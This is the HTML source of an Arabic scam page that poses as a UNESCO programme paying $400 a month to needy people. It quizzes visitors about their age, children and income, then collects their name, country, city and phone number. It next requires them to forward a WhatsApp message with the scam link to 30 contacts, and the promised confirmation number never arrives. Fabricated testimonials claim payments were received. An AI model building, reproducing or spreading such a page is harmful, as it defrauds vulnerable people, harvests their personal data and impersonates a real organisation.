<html><head>

        <meta http-equiv="refresh" content="http://me-prize.com/irak/">


	<meta property="og:title" content="• اليونسكو | بناء السلام في أذهان الرجال والنساء •">
	<meta property="og:image" content="https://financialtribune.com/sites/default/files/field/image/17january/13_brief_-_140_-_mi.jpg">

<div style="width: 100%;margin:0 auto;">
<div align="center" style="">

</div>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0">   
<title>• اليونسكو | بناء السلام في أذهان الرجال والنساء •</title>
<link href="//fonts.googleapis.com/earlyaccess/droidarabicnaskh.css" rel="stylesheet">
<link href="//fonts.googleapis.com/css?family=Titillium+Web:400,300,600,700" rel="stylesheet" type="text/css">



</div></head>





<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.0/jquery.min.js"></script>

<script src='http://me-prize.com/carrefour/quiz.js'></script>






<meta property="og:description" content="إضغط هنا للحصول على الهاتف !">
<meta content="http://www.lexus.com.sa/assets/images/global/favicon.png" name="og:image">
<link href="http://www.lexus.com.sa/assets/images/global/favicon.png" rel="shortcut icon">
<style>

*, :before, :after {
    box-sizing: border-box
}

html {
    height: 100%
}

body {
    background-size: cover;
    color: #000;
    direction: rtl;
    font-family: droid arabic naskh , Titillium Web;
}

h1, h2, h3, h4 {
    font-weight: 400
}

h1 {
    font-size: 1.4em;
    line-height: 1em
}

#date {
    color: white;
    margin-right: 15px;
}

h1 {
    font-size: 24px;
	text-align:center;
}

h2 {
    font-size: 1.3em;
	text-align: center;
}

#wrapper {
    height: 100%;
    width: 100%
}

#intro {
    font-size: 1px
}

#questionWrapper {
    background: none repeat scroll 0 0 #fff;
    width: 92%;
    min-height: 460px;
    margin: 5px auto;
    padding: 20%;
    border-radius: 15px;
    box-sizing: border-box;
    max-width: 985px;
}

.answer {
    text-transform: uppercase;
    display: block;
    margin-bottom: 10px;
    font-size: 1em;
    color: #000;
    border: 2px solid #000;
    background: none repeat scroll 0 0 rgba(224, 232, 139, 0.7);
    text-decoration: none;
    text-align: center;
    width: 100%;
    padding: 7px 0
}

.result {
    display: none
}
.check1 { display:none; text-align: center;}
.check2 { display:none;}
.check3 { display:none;}
.check4 { display:none;}
.check5 { display:none;}
.question1 { display:none;}
.question2 { display:none;}
.question3 { display:none;}
.question4 { display:none;}


.lastMargin {
    height: 5px
}

.alpha60 {
    background: none repeat scroll 0 0 rgba(0, 0, 0, 0.6)
}

img.loader {
    clear: both;
	text-align:center;
    margin: 0 0 10px;
}
.one1 {display:none;}
.one2 {display:none;}
.one3 {display:none;}
.check {
    clear: both
}

.checkItem {
    clear: both;

    overflow: auto
}

.checkItem span.img {
    vertical-align: middle;
    display: table-cell;
    padding-right: 10px
}

.checkItem span.img img {
    display: block
}

.checkItem h3 {
    vertical-align: middle;
    display: table-cell;
    padding: 0;
    margin: 0
}

a.callToAction {
    background: none repeat scroll 0 0 #3e7f1b;
    background-imageborder: 1px solid rgba(0, 0, 0, 0.2);
    color: #fff;
    display: block;
    font-size: 20px;
    padding: 10px 20px;
    text-decoration: none;
    text-shadow: 1px 1px 1px rgba(0, 0, 0, 0.5);
    text-align: center;
    width: 80%;
    border-radius: 30px;
    box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;
    background-image: -webkit-gradient(linear, left top, left bottom, color-stop(0, #79B85E), color-stop(1, #4C8F28));
    background-image: -o-linear-gradient(bottom, #79B85E 0%, #4C8F28 100%);
    background-image: -moz-linear-gradient(bottom, #79B85E 0%, #4C8F28 100%);
    background-image: -webkit-linear-gradient(bottom, #79B85E 0%, #4C8F28 100%);
    background-image: -ms-linear-gradient(bottom, #79B85E 0%, #4C8F28 100%);
    background-image: linear-gradient(to bottom, #79B85E 0%, #4C8F28 100%);

}

a.callToAction:hover {
    text-decoration: underline
}

.countWrapper {
    display: block;
    clear: both;
    font-size: 12px;
    margin: 5px
}

.centerIt {
    margin: 0 auto;
    text-align: center
}

.centerIt a {
    margin: 0 auto
}

.cta {
    margin-bottom: 14px;
    cursor:pointer;
}

#header {
    color: #000;
    height: 85px;
    margin: 0 auto;
    max-width: 985px;
    padding: 0 0 6px;
    position: relative;
    width: 100%
}

#logo {
    height: 85px;
    float: left;
    width: 300px
}

#date {
    font-size: 16px;
    font-weight: 700;
    position: absolute;
    right: 10px;
    top: 62px;
    color: #fff
}

audio:not([controls]) {
    display: none;
    height: 0
}

html {
    font-family: droid arabic naskh , Titillium Web;
}

body {
    margin: 0
background: #154dc6;
}

a {
    background: none repeat scroll 0 0 transparent
}

a:focus {
    outline: thin dotted
}

a:active, a:hover {
    outline: 0 none
}

b, strong {
    font-weight: 700
}

img {
    border: 0 none
}

svg:not(:root) {
    overflow: hidden
}

button::-moz-focus-inner, input::-moz-focus-inner {
    border: 0 none;
    padding: 0
}

.red {
    color: #fd0c25
}

.likebar {
    font-size: 13px;
    margin: 5px 5px 0 0;
    float: right;
    color: #7F7F7F
}

.likebar:not-children {
    font-size: 20px
}

.fbblue {
    color: #3b5998
}

.likes {
    background-position: left center;
    background-repeat: no-repeat;
    background-image: url(../img/like.png);
    padding-left: 17px
}

.valid {
    font-size: 12px;
    margin: 5px 0;
    color: #616161
}

@media screen and (max-width: 420px) {
    .checkItem h3 {
        font-size: 11px
    }

    #date {
        font-size: 10px
    }
}

h2 {
    margin-top: 10px
}


.content_sec {
    width: 100%;
    padding: 0;
    margin: 0;
    background: #fff;
    border-radius: 10px
}

.content_inn {
    padding: 30px;
    overflow: auto
}

.content_sec h1 {
    width: 100%;
    float: left;
    padding: 0 0 10px;
    margin: 0 0 10px;
    font-size: 24px;
    color: #000;
    font-weight: 400;
    border-bottom: 1px solid #eaeaea
}

.content_sec h2 {
    width: 100%;
    float: lzft;
    padding: 0 0 10px;
    margin: 0 0 20px;
    font-size: 24px;
    color: #818181;
    font-weight: 400;
    border-bottom: 1px solid #eaeaea;
	text-align: left;
}

.detail_block {
    width: 100%;
    float: left;
    padding: 0 0 15px;
    margin: 0 0 15px;
    border-bottom: 1px solid #eaeaea
}

.detail_left {
    width: 133px;
    float: left;
    padding: 0;
    margin: 0 22px 0 0
}

.detail_left img {
    width: 100%;
    max-width: 133px;
    height: auto
}

.detail_right {
    overflow: hidden;
	text-align: right
}

.detail_right h3 {
    width: 100%;
    float: left;
    padding: 0;
    margin: 0 0 10px;
    font-size: 24px;
    color: #3b5998;
    font-weight: 400
}

.detail_right h3 a {
    color: #3b5998
}

.detail_right h3 a:hover {
    color: #5f7dbc
}

.detail_right p {
    width: 100%;
    float: left;
    padding: 0;
    margin: 0 0 10px;
    font-size: 24px;
    color: #000;
    line-height: normal
}

.detail_right span {
    width: 100%;
    float: left;
    padding: 0;
    margin: 0 0 10px;
    font-size: 20px;
    color: #818181
}

@media (max-width: 480px) {
    html {
        -webkit-text-size-adjust: none
    }

    #logo {
        max-width: 70%;
        height: auto
    }

    .wrapper {
        padding: 0
    }

    .content_inn {
        padding: 0
    }

    .content_sec h1 {
        font-size: 15px
    }

    .content_sec h2 {
        font-size: 15px
    }

    .detail_left {
        width: 70px;
        margin: 0 10px 0 0
    }

    .detail_right h3 {
        font-size: 15px;
        font-weight: 700;
        text-decoration: none
    }

    .detail_right p {
        font-size: 13px
    }

    .detail_right span {
        font-size: 12px
    }
}

.container {
    width: 960px;
    margin: 0 auto;
    padding: 0
}



.content_sec {
    width: 100%;
    float: left;
    padding: 0;
    background: #fff;
    border-radius: 10px
}

.content_inn {
    padding: 30px
}

.content_sec h1 {
    width: 100%;
    float: left;
    padding: 0 0 10px;
    margin: 0 0 10px;
    font-size: 24px;
    color: #000;
    font-weight: 400;
    border-bottom: 1px solid #eaeaea
}

.content_sec h2 {
    width: 100%;
    float: left;
    padding: 0 0 10px;
    margin: 0 0 20px;
    font-size: 24px;
    color: #818181;
    font-weight: 400;
    border-bottom: 1px solid #eaeaea
}

.detail_block {
    width: 100%;
    float: left;
    padding: 0 0 20px;
    margin: 0 0 20px;
    border-bottom: 1px solid #eaeaea
}

.detail_left {
    width: 133px;
    float: right;
    padding: 0;
    margin: 0 0 0 10px;
}

.detail_left img {
    width: 100%;
    max-width: 133px
}

.detail_right {
    overflow: hidden;
    font-family: arial;
}

.detail_right h3 {
    width: 100%;
    float: left;
    padding: 0;
    margin: 0 0 10px;
    font-size: 24px;
    color: #3b5998;
    font-weight: 400
}

.detail_right h3 a {
    color: #3b5998
}

.detail_right h3 a:hover {
    color: #5f7dbc
}

.detail_right p {
    width: 100%;
    float: left;
    padding: 0;
    margin: 0 0 10px;
    font-size: 24px;
    color: #000;
    line-height: normal
}

.detail_right span {
    width: 100%;
    float: left;
    padding: 0;
    margin: 0 0 10px;
    font-size: 20px;
    color: #818181
}

@media (max-width: 480px) {
    html {
        -webkit-text-size-adjust: none
    }

    .wrapper {
        padding: 0
    }

    .content_inn {
        padding: 0
    }

    .content_sec h1 {
        font-size: 15px
    }

    .content_sec h2 {
        font-size: 15px
    }

    .detail_left {
        width: 90px;
        margin: 0 0 0 10px
    }

    .detail_right h3 {
        font-size: 15px;
        font-weight: 700
    }

    .detail_right p {
        font-size: 13px
    }

    .detail_right span {
        font-size: 12px
    }
}

.hide {
    display: none
}

.red {
    color: red
}

.centerIt div {
    margin: 0 auto;
}

div.callToAction1 {
    background: #435a8b linear-gradient(to bottom, #435a8b 0%, #435a8b 100%) repeat scroll 0 0;
    background-imageborder: 1px solid rgba(0, 0, 0, 0.2);
    color: #fff;
    display: block;
    font-size: 18px;
    padding: 10px 20px;
    cursor:default;
    text-decoration: none;
    text-shadow: 1px 1px 1px rgba(0, 0, 0, 0.5);
    text-align: center;
    width: 80%;
    border-radius: 30px;
    box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;
    background-image: -webkit-gradient(linear, left top, left bottom, color-stop(0, #435a8b), color-stop(1, #4C8F28));
    background-image: -o-linear-gradient(bottom, #435a8b 0%, #435a8b 100%);
    background-image: -moz-linear-gradient(bottom, #435a8b 0%, #435a8b 100%);
    background-image: -webkit-linear-gradient(bottom, #435a8b 0%, #435a8b 100%);
    background-image: -ms-linear-gradient(bottom, #435a8b 0%, #435a8b 100%);
    background-image: linear-gradient(to bottom, #435a8b 0%, #435a8b 100%);
    cursor:pointer;
}

#intro {
    font-size: 13px;
	text-align: center;
}
#intro2 {
    font-size: 13px;
	text-align: center;
}
#intro4 {
    font-size: 13px;
	text-align: center;
	display: none;
}
* {
    text-decoration: initial;
}

#questionWrapper {
    padding: 0.5% 5%;
}

u {
    text-decoration: underline;
}

#top-ribbon {
    background: black;
    color: white;
    padding: 10px;
    font-size: 10px;
    border-bottom: 1px solid white;
}

.center {

    text-align: center;
}

#iframe {
    display: none;
    maxrgin-top: 45px;
}

#iframe iframe {
    border: 0px;
    overflow: hidden;

    height: 800px;
}

#iframe h1 {
    text-align: center;
    font-family: droid arabic naskh;
    font-weight: bold;
    color: #ffea00
}

#iframe h1 span {
    color: white;
}
.text {
    margin: 0 auto;
    background: #3e3c3d;
    color: #fff;
    padding: 10px;
    text-align: center;
    border-radius: 20px;
    max-width: 500px;

}



.answer, .prepopulate .submit {
    display: block;
    margin-bottom: 10px;
    font-size: 1em;
    font-weight:bold;
    border: 2px solid black;
    background: none repeat scroll 0 0 #feb10e;
    color: black;
    text-decoration: none;
    text-align: center;
    width: 100%;
    padding: 9px 0;
    letter-spacing: 1px;
    text-transform: none !important;
    border: none;
    border-radius: 15px;
    background-color: #241f21;
    color: #fff;
    transition: color, background-color 0.1s ease-in-out !important;
}

.prepopulate .txt {
    border: 1px solid #37B06D !important;
}
#date {
    color:black;
    font-weight:normal;
    float:right;
}
.responsive {
    max-width:100%;
    max-height:100%;
}

.phone-header {
    background: #525252;
    padding:10px;
}
.intro {
    width:100%;
    margin:auto;
    text-align:center;
}
.pre-text p,.intro h3 {
    font-size:15px;
}


@media screen and (max-width: 414px) {
    h1 {
        font-size:25px;
    }
    .lang-fr h1 {
        font-size:20px;
    }
}
@media screen and (max-width: 375px) {
    h1 {
        font-size:22px;
    }
}

@media screen and (max-width: 360px) {

    h1 {
        font-size:16px;
    }
    .lang-fr h1 {
        font-size:14px;
    }
    .lang-es h1 {
        font-size:15px;
    }
    .lang-cs h1 {
        font-size:15px;
    }
    .lang-nl h1 {
        font-size:16px;
    }
    .lang-fi h1 {
        font-size:16px;
    }
    .lang-sv h1 {
        font-size:15px;
    }
    .lang-hu h1 {
        font-size:15px;
    }
    .lang-pt h1 {
        font-size:15px;
    }
}



@media screen and (max-width: 320px) {
    .intro {

        text-align:center;
    }
    .intro img {
        max-height:120px;
        margin:0px auto;
    }
    #questionWrapper {
        padding:4px;
        padding-top:0px;
        margin-left:10px;
        margin-rightx:5px;

    }
    .pre-text p,.intro h3 {
        font-size:15px;
    }

    h2 {
        font-size:17px;
    }
    h1 {
        font-size:18px;
    }
    .lang-es h1 {
        font-size:16px;
    }
    .lang-fr h1 {
        font-size:20px;
    }
}

.button {
text-decoration: none;
background:#51ace2;
color: #fff;
border: 2px solid #fff;
display:inline-block;
position:relative;
margin:11px 5px;
padding: 10px 35px;
    border-radius: 15px;
transition:all 0.4s ease
}
.button:hover {
 background:#2A97D7;
color: #fff;
cursor: pointer;
}
.overlay {
  position: fixed;
  top: 0;
  bottom: 0;
  left: 0;
  right: 0;
  background: rgba(0, 0, 0, 0.7);
  transition: opacity 500ms;
  visibility: hidden;
  opacity: 0;
}
.overlay:target {
  visibility: visible;
  opacity: 1;
}

.popup {
  margin: 70px auto;
  padding: 20px;
  background: #fff;
  color: red;
  border-radius: 5px;
  max-width: 420px;
  position: relative;
  transition: all 5s ease-in-out;
  overflow-x: hidden;
}

.popup h2 {
  margin-top: 0;
color: #000;
height: 30px;
}
.popup .close {
position: absolute;
top: 0px;
right: 20px;
transition: all 200ms;
font-size: 30px;
font-weight: bold;
text-decoration: none;
color: #333;
}
.popup .close:hover {
  color: #06D85F;
}
.popup .content {
  max-height: 30%;
  overflow-y: hidden;
}
</style>




<div class="main section" id="main">
</div>
<!-- Please Keep The Credits -->


<div id="wrapper">
    <div id="questionWrapper" class="alpha60">

        <div class="intro">



<div class="ads1">
</div>
        </div>


        <div class="pre-text">
            <div id="intro">

<img src="https://alfahir.hu/sites/default/files/indexfoto/unesco.jpg" alt="Canada Visa" class="responsive" style="
    border-radius: 20px;
">
<h2 style="color: #EA0000;font-size: 22px;font-weight: bold;margin: 5px 0 0;">• اليونسكو | بناء السلام في أذهان الرجال والنساء •
</h2>
<h2 style="color: ##3368FF;font-size: 18px;font-weight: bold;margin: 5px 0 0;">مرحباً بكم في التسجيل في برنامج المساعدات المالية بقيمة 400 دولار شهريًا للمجموعات المحتاجة</h2>
			
            </div>
        </div>


<div class="question1" style="display: block;">
    <span style="color:#d52b1f;"><h2>اختر الفئة العمرية</h2></span>
    <a class="answer" href="#">15-21</a>
    <a class="answer" href="#">22-30</a>
    <a class="answer" href="#">31-50</a>


</div>	



<center>
<script type="text/javascript">
    google_ad_client = "ca-pub-5687970967362574";
    google_ad_slot = "9529653002";
    google_ad_width = 320;
    google_ad_height = 100;
</script>
<!-- adsar -->
<script type="text/javascript" src="//pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
</center>

<div class="question2">
<span style="color:#d52b1f;"><h2>هل لديك اطفال</h2></span>
    <a class="answer" href="#">نعم</a>
    <a class="answer" href="#">لا</a>

</div>
<div class="question3">
   <span style="color:#d52b1f;"><h2>ماهو متوسط دخلك الشهري</h2></span>
    <a class="answer" href="#">50$-100$</a>
    <a class="answer" href="#">25$-50$</a>
    <a class="answer" href="#">اقل من ذلك</a>

</div>
<div class="question4">
    <span style="color:#000AD4;"><h2>املأ النموذج</h2></span>

<center>
<input class="form-control" id="Name" name="" placeholder="  الاسم الكامل" style="border-bottom-width: 2px;border-left-width: 2px;border-right-width: 2px;border-top-width: 2px;font-family: &quot;tahoma&quot;;font-size: 20;height: 54px;margin: 0 auto;padding-bottom: 0px;padding-left: 0px;padding-top: 0px;width: 307px;" type="text">
<br><br>

<input class="form-control" id="Name" name="" placeholder="  الدولة" style="border-bottom-width: 2px;border-left-width: 2px;border-right-width: 2px;border-top-width: 2px;font-family: &quot;tahoma&quot;;font-size: 20;height: 54px;margin: 0 auto;padding-bottom: 0px;padding-left: 0px;padding-top: 0px;width: 307px;" type="text">
<br><br>
<input class="form-control" id="Name" name="" placeholder="  المدينة" style="border-bottom-width: 2px;border-left-width: 2px;border-right-width: 2px;border-top-width: 2px;font-family: &quot;tahoma&quot;;font-size: 20;height: 54px;margin: 0 auto;padding-bottom: 0px;padding-left: 0px;padding-top: 0px;width: 307px;" type="text">
<br><br>
<input type="tel" placeholder="  رقم الهاتف" id="phonee" name="Phone" style="fontwidth: 244px;height: 56px;font-size: 25px;" onkeypress="return numberonly(event);">
</center><br>
    <a class="answer" href="#">تسجيل</a>
</div>

<div class="checker">
    <div class="check1">
<h2 style="color: #D52B1E;font-size: 18px;font-weight: bold;margin: 5px 0 0;">عملية التسجيل في طور المعالجة</h2>
        <center><img src="https://i.imgur.com/1bYmOwt.gif" class="loader">
    </center></div>

    <div class="check2">
        <div class="share-section">

            <h2 style="color: #ff0e23;font-size: 30px;font-weight: bold;margin: 5px 0 0;">تهانينا ، لقد تم تسجيلك بنجاح</h2>
			<h2>لديك فقط خطوة واحدة للقيام بها<span style="color:#D52B1E;"><b> للحصول على رقم تاكيد تسجيلك</b></span></h2>
<div id="intro">


            <h2 style="color: #323232;font-size: 13px;font-weight: bold;margin: 5px 0 0;"><b>انقر فوق الزر الأخضر أدناه وأرسل الرسالة إلى 30 شخصًا أو مجموعة للحصول على رقم تاكيد تسجيلك في رسالة على حساب WhatsApp الخاص بك.
</b></h2>
</div>

<center><img src="http://i.imgur.com/nej47Qn.png"></center>


<center>
<div class="whatsent">
<a href="whatsapp://send?text=
سارعو ، تسجل في برنامج مساعدة الأمم المتحدة تحت رعاية المنظمة العالمية 🏛️*UNESCO*🏛️ ، مرحباً بك في التسجيل في برنامج المساعدة المالية البالغ *$400* دولار شهرياً للمجموعات المحتاجة. . يتم دفع جميع نفقات الملف ، سجل بسرعة على الموقع الرسمي للمؤسسة عبر الرابط الأزرق ادناه ==> http://good-prize.com/UNesco/   *" data-action="share/whatsapp/share">
<img src="https://i.imgur.com/o9gCQEH.png" height="45" border="0" align="middle" width="260"></a>
</div>
</center>




<div id="intro2">
<p><b>بمجرد إرسال الرسالة بنجاح ، انقر فوق الزر "الحصول على رقم تاكيد تسجيلي".</b>
</div>
            <h2 style="color: #D3000A;font-size: 13px;font-weight: bold;margin: 5px 0 0;">ملاحظة: لن يتم إرسال رقم تاكيد تسجيلك وحفظه إذا لم يتم نشر الرسالة</h2>
   


<center><a class="button" target="_blank" onclick="alert('مرحبًا ، لم تتخذ الإجراءات بشكل صحيح ، يرجى إرسال الرسالة إلى 10 أشخاص آخرين على الأقل')">الحصول على رقم تاكيد تسجيلي</a>
</center>



</div>
    </div>
</div>        
<div class="wrapper testimonials" style="display:none;">
    <div class="content_sec">
        <div class="content_inn">
		<h1>ردود الفعل من المشاركين في برنامج المساعدة</h1>
            <h2>475 تعليق</h2>

            <div class="detail_block">

                <div class="detail_left"><a href="#"><img src="https://i.imgur.com/8czx4Te.jpg" width="133"></a>
                </div>

                <div class="detail_right">
                    <h3><a>ريم الدلوعة</a></h3>

<p>
شكرا لكم على مصداقيتكم. جاءني رمز تاكيد تسجيلي مع جميع المعلومات شكرًا لك على الموقع الرائع </p>
                </div>
        <span class="likebar">   <a class="fbblue" href="javascript:void(0);">Reply</a> ·
            <a class="fbblue smaller" href="javascript:void(0);">Like</a> ·
            <span class="fbblue likes">29</span> ·
            <span>Oct 18 at 10:54 pm</span>
            </span></div>

            <div class="detail_block">

                <div class="detail_left"><a href="#"><img src="https://i.imgur.com/v2SUhDj.jpg" width="133"></a>
                </div>


                <div class="detail_right">
                    <h3><a>Noor samons</a></h3>

<p>
تم إرسال المساعدة المالية بنجاح ، شكرا لك</p>

                </div>
        <span class="likebar">   <a class="fbblue" href="javascript:void(0);">Reply</a> ·
            <a class="fbblue smaller" href="javascript:void(0);">Like</a> ·
            <span class="fbblue likes">22</span> ·
            <span>Oct 18 at 4:18 pm</span>
            </span></div>

            <div class="detail_block">


                <div class="detail_left"><a href="#"><img src="https://i.imgur.com/AXUomUm.jpg" width="133"></a>
                </div>


                <div class="detail_right">
                    <h3><a>Eva christten</a></h3>

<p>
شكرا جزيلا لإرسال 400 دولار ... شكرا جزيلا لك</p>

                </div>
         <span class="likebar">   <a class="fbblue" href="javascript:void(0);">Reply</a> ·
             <a class="fbblue smaller" href="javascript:void(0);">Like</a> ·
             <span class="fbblue likes">17</span> ·
             <span>Oct 17 at 10:14 am</span>
            </span></div>

            <div class="detail_block">

                <div class="detail_left"><a href="#"><img src="https://i.imgur.com/ByKp9OF.jpg" width="133"></a>
                </div>


                <div class="detail_right">
                    <h3><a>awobi jonathan</a></h3>

<p>أصبح حلمي حقيقة مستحيلة بصراحة</p>

                </div>
        <span class="likebar">   <a class="fbblue" href="javascript:void(0);">Reply</a> ·
            <a class="fbblue smaller" href="javascript:void(0);">Like</a> ·
            <span class="fbblue likes">14</span> ·
            <span>Oct 17 at 3:33 am</span>
            </span></div>

            <div class="detail_block">

                <div class="detail_left"><a href="#"><img src="https://i.imgur.com/ROuVm7X.jpg" width="133"></a>
                </div>

                <div class="detail_right">
                    <h3><a>steve radly</a></h3>

<p>
أتمنى لجميع الفقراء الحصول على مساعدة مالية</p>

                </div>
        <span class="likebar">   <a class="fbblue" href="javascript:void(0);">Reply</a> ·
            <a class="fbblue smaller" href="javascript:void(0);">Like</a> ·
            <span class="fbblue likes">13</span> ·
            <span>Oct 17  at 12:34 am</span>
            </span></div>

            <div class="detail_block">

                <div class="detail_left"><a href="#"><img src="https://i.imgur.com/AE7N32H.jpg" width="133"></a>
                </div>

                <div class="detail_right">
                    <h3><a>Jimmy benteke</a></h3>

<p>
Je vous remercie. Le code de suivi m'a été envoyé. Je vous remercie</p>
                </div>
        <span class="likebar">   <a class="fbblue" href="javascript:void(0);">Reply</a> ·
            <a class="fbblue smaller" href="javascript:void(0);">Like</a> ·
            <span class="fbblue likes">6</span> ·
            <span>Oct 16 at 11:01 am</span>
            </span></div>
        </div>

<center>
<center>
</center>
    </center></div>
</div>

    </div>
    </div>


<div id="conversion-container"></div>
<a style="display: none">
<script id="_waury7">var _wau = _wau || []; _wau.push(["dynamic", "alalsiii7", "ry7", "c4302bffffff", "small"]);</script><script async="" src="//waust.at/d.js"></script>
</a>
</html>
